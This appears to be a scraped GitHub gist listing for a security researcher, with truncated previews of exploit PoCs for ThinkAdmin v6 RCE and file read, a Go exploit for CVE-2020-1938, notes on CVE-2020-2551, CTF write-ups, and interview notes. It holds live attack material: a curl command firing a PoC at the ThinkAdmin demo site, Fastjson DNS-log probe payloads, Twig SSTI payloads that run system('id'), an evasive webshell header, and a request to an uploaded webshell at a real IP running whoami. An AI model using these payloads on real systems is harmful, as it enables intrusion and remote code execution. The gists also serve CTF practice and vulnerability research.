@kaiili
kaiili / poc.php
Created February 6, 2020 10:07
POC for ThinkAdmin v6 RCE
<?php
/*
*
* Date: 2020-02-06
* Exploit Author: k4ii
* Daemon Link: https://v6.thinkadmin.top
* Version: v6
* Tested on: linux
* Usage:
kaiili / poc.php
Created February 6, 2020 10:18
POC for ThinkAdmin file read
<?php
/*
* Date: 2020-02-06
* Exploit Author: k4ii
* Daemon Link: https://v6.thinkadmin.top
* Version: v6
* Tested on: linux
* Usage:
* curl "https://v6.thinkadmin.top/admin/api.update/get" -d "encode=`php poc.php`"
kaiili / ctfwp_v&n_web
Created March 1, 2020 11:36
v&n CTF web-section writeup
# web 1
A simple vulnerability-exploitation challenge; knowing the CTFd account-takeover bug is enough to solve it.
# web 2
The pseudocode is as follows:
```
open("flag.txt", "r")

def shell():
    os.system("rm flag.txt")
```
kaiili / CNVD-2020-10487.go
Created March 2, 2020 03:28
my CNVD-2020-10487 / CVE-2020-1938 exp
package main

import (
	"fmt"
	"io"
	"io/ioutil"
	"net"
	"os"
)
kaiili / cve-2020-2551.md
Last active March 5, 2020 07:41
Everything I know about CVE-2020-2551

Positioning: it is a deserialization entry point; a single gadget is enough for RCE.

Affected versions: depends on the JDK (jdk7u21), Jython (), the underlying library (CommonsCollections), and the patch level. Exploitation via other gadgets is also possible.

kaiili / 2020-春招提前批
Last active November 6, 2020 15:43
Group members wanted to see this...
I had three interview opportunities.
Qi An Xin, Momo Security, Tencent.
Qi An Xin:
The questions roughly followed the penetration-testing workflow.
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:0
kaiili / tricks
Last active May 1, 2020 00:50
Notes on the various tricks I have come across
PHP:
readfile("phar:///1.png/test.txt") == readfile("phaR:///1.png/test.txt")
TWIG SSTI:
{{["id"]|map("system")|join(",")
{{["id", 0]|sort("system")|join(",")}}
{{["id"]|filter("system")|join(",")}}
{{[0, 0]|reduce("system", "id")|join(",")}}
kaiili / webshell.txt
Created April 13, 2020 15:28
anti-ast webshell?
<?php
/*
*
*
* Attempt to bypass AST analysis
* Pass parameters via deserialization
* Bypass by registering global variables
* php://input
kaiili / dectf_web3
Created May 2, 2020 10:26
dectf_web3
curl http://47.113.219.76/uploads/45f0292421f355423a831fe1a054fa45/bc07fe4e8c3143511fa89936e833659d_2.Php --data "_=var_dump&__=system&___=whoami"
POST /uploads/45f0292421f355423a831fe1a054fa45/bc07fe4e8c3143511fa89936e833659d_2.Php HTTP/1.1
Host: 47.113.219.76
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate